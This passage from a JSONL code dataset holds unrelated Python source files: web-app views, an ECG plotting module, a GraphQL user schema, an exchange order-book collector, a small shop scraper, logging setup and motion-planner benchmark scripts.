Returns\n -------\n Any\n \"\"\"\n value = value.strip()\n if value.isdigit():\n return int(value)\n try:\n return float(value)\n except ValueError:\n pass\n if value.lower() in ['true', 'false']:\n return value.lower() == 'true'\n if value.lower() in ['none', 'null']:\n return None\n if value.startswith('\"') and value.endswith('\"'):\n value = value[1:-1]\n if value.startswith(\"'\") and value.endswith(\"'\"):\n value = value[1:-1]\n if '~' in value:\n value = str(Path(value).expanduser())\n return value\n\n\ndef parse_line(line: str, sep: str = '=') -> tuple[str, Any] | None:\n \"\"\"\n Parses a line into a key and value.\n\n Examples\n --------\n `key = value`\n `key: value`\n\n Parameters\n ----------\n line: str\n sep: str\n The separator for splitting\n\n Returns\n -------\n Tuple[str, Any]\n The key and value of the line.\n \"\"\"\n if line.startswith('#'):\n return None\n if sep not in line:\n return None\n key, value = line.split(sep, 1)\n value: Any = parse_value(value)\n return key, value\n","repo_name":"mas-4/scrummy","sub_path":"scrummy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27839744027","text":"\"\"\"Video Qualities API\"\"\"\n\nfrom api.base import Base\n\n\nclass VideoQuality(Base):\n \"\"\"Video Quality implementation of Base API class\"\"\"\n\n _url = Base._url + \"/video_qualities\"\n id_list_to_delete = []\n current_id = \"\"\n\n def create(self, name: str, abbr=\"AbbrVideoTest\", position=1, default=False) -> dict:\n \"\"\"Create Video Quality\"\"\"\n\n body = {\n \"name\": name,\n \"abbr\": abbr,\n \"position\": position,\n \"default\": default\n }\n\n response = Base.create_item(self, body)\n return response\n\n def update(self, item_id, name: str, abbr=\"NewAbbrVideoTest\", position=20, default=True):\n \"\"\"Update Video Quality\"\"\"\n\n body = {\n \"name\": name,\n \"abbr\": abbr,\n \"position\": position,\n \"default\": default\n }\n\n Base.update_item(self, item_id, body)\n","repo_name":"vit-ganich/herokuapp-tests","sub_path":"api/video_quality.py","file_name":"video_quality.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6542648366","text":"#!/usr/bin/python3\n#\n# ECG Viewer\n# Written by Kevin Williams - 2022\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n\nimport math\nimport numpy\nimport logging\nimport pyqtgraph as pg\nfrom PyQt5 import QtCore\nfrom scipy.signal import savgol_filter\n\n\ndef graph_draw(self) -> None:\n \"\"\"\n Draws the data stored in self.value_history to the pyqtgraph window.\\n\n Pulls the status of the 'Show Signal Tracking' checkbox.\\n\n If the checkbox is checked, it draws the raw, unfiltered waveform with tracking information.\\n\n If the checkbox is not checked, it draws the savgol-filtered data.\n \"\"\"\n\n # display the filtered graph\n if not self.show_track.isChecked():\n try:\n fdat = savgol_filter(\n self.value_history,\n window_length = self.window_length_box.value(),\n polyorder = self.polyorder_box.value(),\n mode = 'interp',\n )[25:self.value_history_max - 25]\n except ValueError as e:\n self.window_length_box.setValue(199)\n self.polyorder_box.setValue(7)\n logging.warning(f\"Invalid filter settings: \\n{e}\")\n return\n self.curve.setData(numpy.arange(fdat.size), fdat, skipFiniteCheck = True)\n\n # Otherwise, display raw waveform with tracking information. VERY SLOW IF ENABLED\n else:\n mean = self.value_history.mean()\n center = self.math_detect_peaks()\n self.graph.clear()\n self.graph.plot(numpy.arange(self.value_history.size), self.value_history, pen = self.green_pen, skipFiniteCheck = True)\n center_line = pg.InfiniteLine(pos = center, angle = 0, movable = False, pen = self.yellow_pen)\n self.graph.addItem(center_line)\n mean_line = pg.InfiniteLine(pos = mean, angle = 0, movable = False, pen = self.red_pen)\n self.graph.addItem(mean_line)\n\n # display a vertical line intersecting each detected peak\n for p in self.peaks:\n l = pg.InfiniteLine(pos = p, angle = 90, movable = False)\n self.graph.addItem(l)\n\n # display holdoff\n for p in self.peaks:\n l = pg.InfiniteLine(pos = p + self.holdoff_box.value(), angle = 90, movable = False, pen = pg.mkPen(color=(200, 200, 255)))\n self.graph.addItem(l)\n\n\ndef graph_fit(self) -> None:\n \"\"\"\n When called, this automatically rescales the graph to fit the data plus\n a padding factor. The padding factor is fetched from the \"zoom\" slider in the\n GUI. This function is fairly slow and should only be called periodically. By\n default, it's only called once a complete sample period has elapsed.\n \"\"\"\n\n self.graph_padding_factor = self.graph_zoom_slider.value() / 100\n high = self.value_history.max()\n low = self.value_history.min()\n pad = math.floor(((high) - (low)) * self.graph_padding_factor)\n self.graph.setRange(\n xRange = (0, self.value_history_max),\n yRange = (high + pad , low - pad)\n )\n\n\ndef graph_bold_toggle(self) -> None:\n \"\"\"\n Doubles the width of the \"pen\" used to draw the graph. There is a performance\n penalty associated with a heavier line. On slower computers, it can be useful\n to reduce the thickness of the line to increase speed. 
This should be called\n    from a UI checkbox.\n    \"\"\"\n\n    if self.actionBold_Line.isChecked():\n        self.green_pen = pg.mkPen('g', width = 2)\n    else:\n        self.green_pen = pg.mkPen('g', width = 1)\n    self.graph.clear()\n    self.curve = self.graph.plot(numpy.arange(self.value_history.size), self.value_history, pen = self.green_pen, skipFiniteCheck = True)\n\n\ndef graph_stop_timer(self):\n    \"\"\"Stops the graph update timer.\"\"\"\n    if self.graph_timer.isActive():\n        self.graph_timer.stop()\n\n\ndef graph_start_timer(self):\n    \"\"\"Starts the graph update timer.\"\"\"\n    if not self.graph_timer.isActive():\n        self.graph_timer.start(self.graph_timer_ms)\n\n\ndef graph_restart_timer(self):\n    \"\"\"\n    Updates the refresh rate timings for the graph drawing routine. If the\n    timer is running, the timer will stop and restart with the new timing.\n    This will not start the timer if the timer wasn't running when called. \n    \"\"\"\n    self.graph_frame_rate = self.FPSGroup.checkedAction().data()\n    self.graph_timer_ms = int(1 / (self.graph_frame_rate / 1000))\n    if self.graph_timer.isActive():\n        self.graph_timer.stop()\n        self.graph_timer.start(self.graph_timer_ms)","repo_name":"HTM-Workshop/ECG-Viewer","sub_path":"_ecg_grapher.py","file_name":"_ecg_grapher.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"33341566151","text":"import string\n\nimport graphene\n\nfrom selene.schema.entity import EntityObjectType, EntityPermission\nfrom selene.schema.base import BaseObjectType\nfrom selene.schema.roles.fields import BaseRoleType\n\nfrom selene.schema.utils import get_text_from_element\n\n\nclass UserRole(BaseRoleType):\n    \"\"\"The role of the user.\"\"\"\n\n    permissions = graphene.List(EntityPermission)\n\n    @staticmethod\n    def resolve_permissions(root, _info):\n        permissions = root.find('permissions')\n        if permissions is None:\n            return None\n        return permissions.findall(\"permission\")\n\n\nclass UserGroup(BaseObjectType):\n    permissions = graphene.List(EntityPermission)\n\n    @staticmethod\n    def resolve_permissions(root, _info):\n        permissions = root.find('permissions')\n        if permissions is None:\n            return None\n        return permissions.findall(\"permission\")\n\n\nclass User(EntityObjectType):\n    roles = graphene.List(UserRole, description=\"The roles of the user.\")\n    group_list = graphene.List(\n        UserGroup, name=\"groups\", description=\"The groups the user belongs to.\"\n    )\n    host_list = graphene.List(graphene.String)\n    hosts_allow = graphene.Boolean(\n        description='If True, allow only listed, otherwise forbid listed.'\n    )\n    iface_list = graphene.List(graphene.String)\n    ifaces_allow = graphene.Boolean(\n        description='If True, allow only listed, otherwise forbid listed.'\n    )\n    sources = graphene.List(\n        graphene.String,\n        description=\"Sources allowed for \" \"authentication for this user.\",\n    )\n\n    @staticmethod\n    def resolve_roles(root, _info):\n        roles = root.findall('role')\n        if not roles or roles is None:\n            return None\n        return roles\n\n    @staticmethod\n    def resolve_group_list(root, _info):\n        groups = root.find(\"groups\")\n        if groups is None:\n            return None\n        return groups.findall(\"group\")\n\n    @staticmethod\n    def resolve_host_list(root, _info):\n        hosts_string = get_text_from_element(root, 'hosts')\n        if not hosts_string:\n            return None\n        hosts_string = hosts_string.translate(\n            str.maketrans('', '', string.whitespace)\n        )\n        return hosts_string.split(',')\n\n    @staticmethod\n    def resolve_hosts_allow(root, _info):\n        hosts = 
root.find(\"hosts\")\n return bool(int(hosts.get(\"allow\")))\n\n @staticmethod\n def resolve_iface_list(root, _info):\n ifaces_string = get_text_from_element(root, 'ifaces')\n if not ifaces_string:\n return None\n ifaces_string = ifaces_string.translate(\n str.maketrans('', '', string.whitespace)\n )\n return ifaces_string.split(',')\n\n @staticmethod\n def resolve_ifaces_allow(root, _info):\n ifaces = root.find(\"ifaces\")\n return bool(int(ifaces.get(\"allow\")))\n\n @staticmethod\n def resolve_sources(root, _info):\n sources_list_xml = root.find('sources').findall('source')\n sources_list = []\n for source in sources_list_xml:\n sources_list.append(source.text)\n return sources_list\n","repo_name":"greenbone/hyperion","sub_path":"selene/schema/users/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"1159786122","text":"from django.shortcuts import render, redirect\r\n\r\nfrom djangoproject.phonebook.models import Contact\r\n\r\n\r\ndef landing_page(request):\r\n contacts = Contact.objects.all()\r\n context = {\r\n 'contacts': contacts\r\n }\r\n return render(request, 'phonebook/index.html', context)\r\n\r\n\r\ndef create_contact(requests):\r\n name = requests.POST.get('name')\r\n number = requests.POST.get('number')\r\n contact = Contact(\r\n name=name,\r\n number=number\r\n )\r\n contact.save()\r\n\r\n return redirect('landing-page')","repo_name":"MitkoVtori/django-phonebook-basic-web-project","sub_path":"djangoproject/djangoproject/phonebook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"26166811599","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 17 02:17:06 2022\n\n@author: isheng\n\"\"\"\n\nimport os\nimport pandas as pd\nimport linkedin_salary_tools as ljs\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\ndef append_to_csv(job_title, job_title_code, mu, sigma, a, n, norm, experience):\n if experience is None:\n str_exp = '-1'\n else:\n str_exp = ', '.join(experience)\n\n new_dict = dict(\n job_title = job_title,\n job_title_code = int(job_title_code),\n avg = mu,\n std_dev = sigma,\n shape = a,\n normal_dist = norm,\n num_salary = n,\n experience = str_exp,\n )\n new_data = pd.DataFrame(new_dict, index=[0])\n\n try:\n curr_data = pd.read_csv('data/job_dist_parameters.csv')\n print('Updating Primary DB')\n updated_data = pd.concat(\n [curr_data, new_data]\n ).reset_index(drop=True)\n\n updated_data.drop_duplicates(\n subset=['job_title_code', 'experience'],\n keep='last',\n inplace=True\n )\n\n updated_data = updated_data.sort_values('job_title')\n\n updated_data.to_csv(\n 'data/job_dist_parameters.csv',\n index=False,\n mode='w'\n )\n except FileNotFoundError:\n print('Primary DB location does not exist. 
Creating now.')\n new_data.to_csv('data/job_dist_parameters.csv', index=False)\n return True\n\n\ndef main(job_title_code, limit=-1, experience=None):\n email = os.environ.get('email')\n password = os.environ.get('password')\n api = ljs.linkedin_job_search(email, password)\n df, common_title, a, mu, sigma, n = api.build_distribution(\n job_title_code=job_title_code,\n days=30,\n limit=limit,\n experience=experience,\n )\n normality = True\n if a != 0:\n normality = False\n append_to_csv(common_title, job_title_code, mu, sigma, a, n, normality, experience)\n\n return df\n\n\nif __name__ == \"__main__\":\n main(\n job_title_code='15',\n limit=250,\n experience=['2','3'],\n )\n","repo_name":"ishengy/recent-market-salaries","sub_path":"src/get_salaries.py","file_name":"get_salaries.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71627833690","text":"import requests \nfrom bs4 import BeautifulSoup\n\nurl = \"https://shop.hakhub.net/\"\n\nr = requests.get(url)\nsoup = BeautifulSoup(r.text, \"html.parser\")\nelem_li = soup.find_all(\"li\", {\"class\":\"product\"})\n\nfor index, li in enumerate(elem_li):\n print(f\"\\n======={index+1}번 상품=======\")\n print('상품명:' ,li.find(\"h2\", {\"class\":\"woocommerce-loop-product__title\"}).text)\n price = li.find(\"span\", {\"class\":\"price\"}).text\n print('가격:',price.split(' ')[-1])\n try:\n print('평점 :',li.find(\"strong\", {\"class\":\"rating\"}).text)\n except Exception as e:\n print('평점 정보가 없어요')","repo_name":"MaiBoii/HackSomething","sub_path":"by_PYTHON/WEB_CRAWLING/4_item_crawling.py","file_name":"4_item_crawling.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69980999131","text":"##########################################\n##\n## Use exchange APIs.\n## Initialize a list of exchanges.\n## Assign multithreading workers to fetch obs.\n## Connect to mongodb.\n## Fetch real-time obs into mongodb as 1) exchange-specific obs and 2) consolidated ob.\n##\n## Yi Bao 06/14/2018\n##\n##########################################\nimport ccxt\nimport time\nimport datetime\nimport pymongo\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pprint import *\nfrom threading import Thread\nfrom lib_index import *\n\n\n''' load exchanges '''\nexchange_names = ['gdax', 'bitfinex', 'gemini', 'kraken', 'bitstamp']\nexchanges = [eval('ccxt.%s()' % x) for x in exchange_names]\nn_ex = len(exchange_names)\nexchanges[1].rateLimit = 2000 # increase bitfinex rateLimit\n\nelapsed = 0\nsymbol = 'BTC/USD' # base/quote\nprices = []\ntimestamps = np.array([])\n\n''' set mongodb parameters '''\nhost = \"gorilla0.aws.noblegrp.com\"\nport = 27017\ndb_name = \"indexation\"\nquery = None\n\n''' connect to mongo '''\ntry:\n db = connect_mongo(host=host, port=port, username=None, password=None, db=db_name)\n print(\"Connection to mongo succeeds\")\nexcept:\n print(\"Connection to mongo fails\")\n\n''' assign workers to fetch each exchange '''\nobs = [{} for _ in range(n_ex)]\nfor i_ex in range(n_ex):\n thread = Thread(target = api_worker, args = [obs, i_ex, exchanges[i_ex], symbol])\n thread.start()\n\ntime.sleep(3)\nstart_time = time.time()\nwhile elapsed < 7200:\n timestamps = np.append(timestamps, datetime.datetime.now())\n con_bid = []\n con_ask = []\n mid = []\n\n for i, ob in enumerate(obs):\n ob['_id'] = timestamps[-1]\n try:\n 
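# store this exchange's snapshot in its own collection, keyed by the shared timestamp\n            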
db[exchange_names[i]].insert_one(ob)\n except pymongo.errors.DuplicateKeyError:\n print(\"insertion of\", exchange_names[i], \"gives a duplicate key\")\n try:\n for order in ob['bids'][:100]:\n con_bid.append(order)\n for order in ob['asks'][:100]:\n con_ask.append(order)\n mid.append((ob['asks'][0][0] + ob['bids'][0][0]) / 2.0)\n except:\n mid.append(np.nan)\n \n con_bid.sort(key = lambda x: x[0], reverse = True)\n con_ask.sort(key = lambda x: x[0]) \n index = cryptoindex(con_ask, con_bid)\n con_dict = {'con_bid': con_bid, 'con_ask': con_ask, 'index': index, '_id': timestamps[-1]}\n try:\n db['consolidated'].insert_one(con_dict)\n except pymongo.errors.DuplicateKeyError:\n print(\"insertion of consolidated order book gives a duplicate key\")\n prices.append([index] + mid)\n print(datetime.datetime.now(), index, mid)\n elapsed += 1\n time.sleep(0.5)\n\nend_time = time.time()\nprint(\"Elapsed time %ssecs\" % (end_time - start_time))\n\n\n'''\nplt.subplot()\nlabels = [\"index\"] + exchange_names\nprices = np.array(prices)\nfor i in range(len(labels)):\n plt.plot(timestamps, prices[:,i], label = labels[i])\nplt.legend()\nplt.grid()\nplt.show()\n'''\n","repo_name":"cqbaoyi/cryptoindex","sub_path":"exchange_handler.py","file_name":"exchange_handler.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18605097858","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 9 21:06:44 2022\n\n@author: 97503\n\"\"\"\nimport os\nimport logging\n\npath = \"./result\"\n# Create the folder if it does not already exist\nif not os.path.exists(path): \n os.makedirs(path)\n\n\n# Step 1: create a logger\nmyLogger = logging.getLogger(\"myLogger\")\nmyLogger.setLevel(logging.INFO) # Master log-level switch; set to INFO here\n\n# Step 2: create a handler that writes to the log file\nlogfile = os.path.join(path,'log.txt')\nfileLogging = logging.FileHandler(logfile) # see the open() file modes for reference\nfileLogging.setLevel(logging.INFO) # log-level switch for file output\n\n# Step 3: create another handler that outputs to the console\ncontrolLogging = logging.StreamHandler()\ncontrolLogging.setLevel(logging.DEBUG) # log-level switch for console output\n\n\n# Step 4: define the handler output format (time, file, line number, level, message)\nformatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: \\n%(message)s\")\nfileLogging.setFormatter(formatter)\ncontrolLogging.setFormatter(formatter)\n\n# Step 5: create a handler that writes result messages to a file\n# WARNING-level messages are treated as result messages\nresultsfile = os.path.join(path,'results.txt')\nresultLogging = logging.FileHandler(resultsfile, encoding= \"utf-8\")\nresultLogging.setLevel(logging.INFO)\nresultfilter = logging.Filter()\nresultfilter.filter = lambda record: record.levelno == logging.WARNING\nresultLogging.addFilter(resultfilter)\n\n# Step 6: attach the handlers to the logger\nmyLogger.addHandler(fileLogging)\nmyLogger.addHandler(controlLogging)\nmyLogger.addHandler(resultLogging)\n\n\nif __name__ == '__main__':\n # Log levels\n myLogger.debug('This is a logger debug message')\n myLogger.info('This is a logger info message')\n myLogger.warning('This is a logger warning message')\n myLogger.error('This is a logger error message')\n myLogger.critical('This is a logger critical message')\n","repo_name":"jerryfat7/PCA_SIFT","sub_path":"mylogging.py","file_name":"mylogging.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7819935512","text":"# Script to plot data from a NetCDF file onto a Basemap\r\n\r\nfrom netCDF4 import Dataset\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import 
Basemap\r\n\r\n# Change the strings according to your dataset\r\nnc = Dataset('../data/pottmp.2014.1time.nc')\r\npottmp = nc.variables['pottmp']\r\nlons = nc.variables['lon'][:]\r\nlats = nc.variables['lat'][:]\r\n# Extracts a 2d field\r\ndata = pottmp[0,0] \r\n\r\n# Replace this with whatever map you want\r\nm = Basemap(projection='ortho', lon_0=-50, lat_0=40, resolution='l')\r\n\r\n# Convert the lons and lats to map coordinates\r\nX,Y = np.meshgrid(lons, lats)\r\nx,y = m(X,Y)\r\n\r\n# Create the plot\r\npc = m.contourf(x, y, data, 30, cmap=plt.get_cmap('YlGnBu_r'))\r\nm.bluemarble()\r\nm.drawmapboundary()\r\nm.drawcoastlines()\r\nplt.title('Orthographic projection of ' + pottmp.long_name + ' (' + pottmp.units + ')')\r\nplt.colorbar(pc, orientation='horizontal')\r\nplt.show()","repo_name":"jonblower/python-viz-intro","sub_path":"Lesson 4. Mapping using the Basemap library/plotmap.py","file_name":"plotmap.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"32"} +{"seq_id":"482446808","text":"#!/usr/bin/env python3\n\"\"\"\nFile: savings_views.py\nAuthor: Zachary King\n\nImplements views/handlers for Savings-related requests\n\"\"\"\n\nfrom django.shortcuts import render, reverse, redirect\nfrom datetime import date, datetime\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nimport decimal\n\nfrom ..models import Wallet, Budget, Transaction, Savings\nfrom ..utils import notifications\n\n\n@login_required(login_url='/pynny/login')\ndef savings(request):\n \"\"\"Displays savings for a user\"\"\"\n # GET = display user's savings\n data = dict()\n if request.method == 'GET':\n # Get the savings for this user\n data['savings'] = Savings.objects.filter(user=request.user)\n\n return render(request, 'pynny/savings/savings.html', context=data)\n # POST = update a Saving\n elif request.method == 'POST':\n # Get the form data from the request\n name = request.POST['name']\n goal = float(request.POST['goal'])\n due_date = request.POST.get('due_date', '')\n if due_date:\n due_date = datetime.strptime(due_date, '%Y-%m-%d').date()\n notify = True if 'notify' in request.POST else False\n delete = True if 'delete' in request.POST else False\n\n # Check if the Saving name exists already\n if Savings.objects.filter(user=request.user, name=name):\n data['alerts'] = {'errors': ['A Saving already exists with that name']}\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data)\n\n # Create the new Saving\n Savings(name=name, goal=goal, balance=decimal.Decimal('0'),\n due_date=due_date if due_date else None,\n delete_on_completion=delete,\n notify_on_completion=notify, completed=False, hidden=False, user=request.user).save()\n\n data['alerts'] = {'success': ['Done! New Saving created successfully!']}\n if notify:\n data['alerts']['info'] = [\n 'Nice! Since you asked to be notified, you\\'ll receive an email when this Saving is fulfilled']\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=201)\n\n\n@login_required(login_url='/pynny/login')\ndef one_saving(request, savings_id):\n \"\"\"Used for requests to a single saving (i.e. /savings/3)\"\"\"\n data = dict()\n # Authorize access to the saving\n try:\n saving = Savings.objects.get(id=savings_id)\n except Savings.DoesNotExist:\n data['alerts'] = {'errors': ['Oh Snap! 
That Saving does not exist']}\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=404)\n\n if saving.user != request.user:\n data['savings'] = Savings.objects.filter(user=request.user)\n data['alerts'] = {'errors': ['Oh Snap! That Saving does not exist']}\n return render(request, 'pynny/savings/savings.html', context=data, status=403)\n\n if request.method == 'GET':\n # TODO - Create single Saving page and implement the view here\n pass\n elif request.method == 'POST':\n action = request.POST['action'].lower()\n\n if action == 'edit_complete':\n name = request.POST['name']\n goal = float(request.POST['goal'])\n due_date = request.POST.get('due_date', None)\n if due_date:\n due_date = datetime.strptime(due_date, '%Y-%m-%d').date()\n notify = True if 'notify' in request.POST else False\n delete = True if 'delete' in request.POST else False\n\n # Make sure the new name doesn't already exist\n if name != saving.name and Savings.objects.filter(user=request.user, name=name):\n data['alerts'] = {'errors': ['Oh Snap! A Saving already exists with that name']}\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=200)\n\n # Data is fine, update the Saving\n saving.name = name\n saving.goal = goal\n saving.due_date = due_date\n saving.notify_on_completion = notify\n saving.delete_on_completion = delete\n if saving.goal <= saving.balance:\n complete_saving(saving)\n data['alerts'] = {'success': ['Congratulations! You met your Savings goal for \"{}\"'.format(saving.name)]}\n data['alerts']['success'].append('Done! Saving updated successfully')\n else:\n saving.save()\n\n data['savings'] = Savings.objects.filter(user=request.user)\n return render(request, 'pynny/savings/savings.html', context=data, status=200)\n\n elif action == 'delete':\n saving.delete()\n data['alerts'] = {'success': ['Done! 
Saving deleted successfully']}\n return render(request, 'pynny/savings/savings.html', context=data)\n\n\ndef complete_saving(saving):\n saving.completed = True\n saving.save()\n\n if saving.notify_on_completion:\n notifications.notify_saving_complete(saving)\n if saving.delete_on_completion:\n saving.delete()\n","repo_name":"zcking/Pynny","sub_path":"mysite/pynny/views/savings_views.py","file_name":"savings_views.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33212621005","text":"import argparse\nimport yaml\n\nfrom unad.loader import LoaderHook, get_loader\nfrom unad.solver_pretrain import SolverPretrain\nfrom unad.utils import seed_everything, init_dist\n\n\ndef main(args):\n # Load config\n with open(args.config, 'r') as f:\n cfg = yaml.load(f, Loader=yaml.SafeLoader)\n print('Using pretraining config', cfg)\n\n # Environment\n seed_everything(1234)\n rank, world_size = init_dist(args)\n use_dist = world_size > 1\n\n # Train\n train_dataloader_hook = LoaderHook(\n **cfg['train_dataloader_hook'],\n use_dist=use_dist\n )\n test_dataloader, _ = get_loader(**cfg['test_dataloader'])\n solver = SolverPretrain(cfg, train_dataloader_hook, test_dataloader,\n use_dist=use_dist, rank=rank, world_size=world_size)\n solver.train()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('config', type=str, help='pretrain config file')\n\n # DDP parameters\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm'],\n default='none',\n help='job launcher')\n parser.add_argument('--backend', default='nccl', type=str)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"Nioolek/UNAD","sub_path":"main_pretrain.py","file_name":"main_pretrain.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7184442017","text":"from rest_framework_jwt.views import ObtainJSONWebToken\n\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\n\n\nclass ObtainJSONWebTokenExtend(ObtainJSONWebToken):\n \"\"\"\n Modify response data for swagger\n \"\"\"\n\n @swagger_auto_schema(\n responses={\n 200: openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties={'token': openapi.Schema(type=openapi.TYPE_STRING)}\n )\n }\n )\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n","repo_name":"scream4ik/devchallenge12_stage1","sub_path":"proxy/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8690559390","text":"\nimport time\ndef trailing_zeros(digit):\n i = 5\n res = 0\n while (i<= digit):\n res = res + digit//i\n i *= 5\n return res\n \n \n \n\ndigit = int(input(\"enter number \"))\nstart = time.time()\nprint(\"trailing zeroes in {0} is {1}\".format(digit,trailing_zeros(digit)))\nend = time.time()\nprint(\"time difference is {0}\".format(end - start))\n\n","repo_name":"princeamitlali/DSA","sub_path":"factorial/trailing_zero.py","file_name":"trailing_zero.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2442544990","text":"from __future__ import print_function,division\nfrom six import iteritems\n\nfrom 
pomp.planners import allplanners\nfrom pomp.planners import test\nfrom pomp.example_problems import *\nfrom pomp.spaces.objectives import *\nimport time\nimport copy\nimport sys\nimport os,errno\n\nnumTrials = 10\n\ndef mkdir_p(path):\n \"\"\"Quiet path making\"\"\"\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\ndef testPlannerDefault(problem,problemName,maxTime,plannerType,**plannerParams):\n global numTrials\n print(\"Planning with\",plannerType,'on problem',problemName)\n planner = problem.planner(plannerType,**plannerParams)\n folder = os.path.join(\"data\",problemName)\n mkdir_p(folder)\n test.testPlanner(planner,numTrials,maxTime,os.path.join(folder,allplanners.filename[plannerType]+'.csv'))\n\n\nall_planners = ['ao-est','ao-rrt','r-est','r-est-prune','r-rrt','r-rrt-prune','rrt*','anytime-rrt','stable-sparse-rrt']\nrrt_planners = ['ao-rrt','anytime-rrt','r-rrt','r-rrt-prune','stable-sparse-rrt']\nest_planners = ['ao-est','r-est','r-est-prune']\n\nall_problems = {'Kink':geometric.kinkTest(),\n 'Bugtrap':geometric.bugtrapTest(),\n 'Dubins':dubins.dubinsCarTest(),\n 'Dubins2':dubins.dubinsTest2(),\n 'Flappy':flappy.flappyTest(),\n 'DoubleIntegrator':doubleintegrator.doubleIntegratorTest(),\n 'Pendulum':pendulum.pendulumTest(),\n 'LQR':lqr.lqrTest()}\n\ndefaultParameters = {'maxTime':30}\ncustomParameters = {'Kink':{'maxTime':40,'nextStateSamplingRange':0.15},\n 'Bugtrap':{'maxTime':40,'nextStateSamplingRange':0.15},\n 'Pendulum':{'maxTime':120,'edgeCheckTolerance':0.1,'selectionRadius':.3,'witnessRadius':0.16},\n 'Flappy':{'maxTime':120,'edgeCheckTolerance':4,'selectionRadius':70,'witnessRadius':35},\n 'DoubleIntegrator':{'maxTime':60,'selectionRadius':0.3,'witnessRadius':0.3},\n 'Dubins':{'selectionRadius':0.25,'witnessRadius':0.2},\n 'Dubins2':{'selectionRadius':0.25,'witnessRadius':0.2}\n }\n\ndef parseParameters(problem,planner):\n global defaultParameters,customParameters\n params = copy.deepcopy(defaultParameters)\n if problem in customParameters:\n params.update(customParameters[problem])\n if '(' in planner:\n #parse out key=value,... 
string\n name,args = planner.split('(',1)\n if args[-1] != ')':\n raise ValueError(\"Planner string expression must have balanced parenthesis, i.e.: func ( arglist )\")\n args = args[:-1]\n args = args.split(',')\n for arg in args:\n kv = arg.split(\"=\")\n if len(kv) != 2:\n raise ValueError(\"Unable to parse argument \"+arg)\n try:\n params[kv[0]] = int(kv[1])\n except ValueError:\n try:\n params[kv[0]] = float(kv[1])\n except ValueError:\n params[kv[0]] = kv[1]\n planner = name\n return planner,params\n\ndef runTests(problems = None,planners = None):\n global all_planners,all_problems\n if planners == None or planners == 'all' or planners[0] == 'all':\n planners = all_planners\n\n if problems == None or problems == 'all' or problems[0] == 'all':\n problems = all_problems.keys()\n\n for prname in problems:\n pr = all_problems[prname]\n for p in planners:\n p,params = parseParameters(prname,p)\n maxTime = params['maxTime']\n del params['maxTime']\n if pr.differentiallyConstrained() and p in allplanners.kinematicPlanners:\n #p does not support differentially constrained problems\n continue\n testPlannerDefault(pr,prname,maxTime,p,**params)\n print(\"Finished test on 